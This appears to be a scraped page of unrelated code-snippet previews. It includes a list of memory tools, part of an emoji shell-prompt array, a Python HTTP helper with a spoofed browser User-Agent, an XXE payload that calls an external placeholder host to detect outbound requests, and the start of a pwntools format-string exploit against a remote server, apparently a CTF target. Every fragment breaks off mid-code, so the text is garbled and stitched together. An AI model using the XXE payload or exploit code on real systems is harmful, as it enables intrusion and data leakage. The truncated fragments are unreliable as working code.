Required tools for playing around with memory:
hexdump
objdump
readelf
xxd
gcore
# emojiparty: a blend of random-emoji and terminalparty | |
PROMPT_EMOJI=(🐶 🐱 🐭 🐹 🐰 🐻 🐼 🐨 🐯 🦁 🐮 🐷 🐽 🐵 🙈 🙉 🙊 🐒 🐔 🐧 \ | |
🐦 🐤 🐣 🐥 🐺 🐗 🐴 🦄 🐝 🐛 🐌 🐜 🕷 🦂 🐠 🐟 🐡 🐬 🐳 🐋 🐆 🐅 🐃 🐂 \ | |
🐄 🐪 🐫 🐘 🐐 🐏 🐑 🐎 🐖 🐀 🐁 🐓 🦃 🕊 🐕 🐩 🐈 🐇 🐿 🎋 🍂 🌾 🌺 \ | |
🌻 🌷 🌼 🌸 💐 🌰 🎃 🐚 🕸 🚕 🚙 🚌 🚎 🚓 🚑 🚐 🚚 🚜 🏍 🚲 🚔 🚍 🚘 🚖 \ | |
🚡 🚟 🚃 🚋 🚅 🚈 🚞 🚆 🚇 🚊 🚉 🚁 🛩 🛫 🛬 ⛵️ 🛥 🚤 ⛴ 🛳 🚀 🛰 💺 🚧 \ | |
😀 😬 😁 😃 😄 😅 😆 😇 😉 😊 🙂 🙃 😋 😌 😍 😘 😗 😙 😚 😜 😝 😛 🤑 🤓 \ | |
😎 🤗 😏 😶 😐 😑 😒 🙄 🤔 😳 😞 😟 😠 😔 😕 🙁 😣 😖 😯 😦 😧 😵 😲 🤐 \ | |
😷 🤒 🤕 😴 💤 💀 👽 🤖 😺 😸 😻 😼 😽 😾 ⚽️ 🏀 🏈 🏐 🏉 🎱 🏌 🏸 🏒 🏑 \ |
#!/usr/bin/env python3 | |
import requests | |
client = requests.Session() | |
debug = False | |
def post(url, data, headers=None, proxy=False): | |
if not headers: | |
headers = {} | |
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36' |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
from pwn import * | |
from libformatstr import * | |
file = ELF("./32_new") | |
flag = 0x0804870b | |
r = remote("163.172.176.29",9035) | |
r.recvuntil("name?") |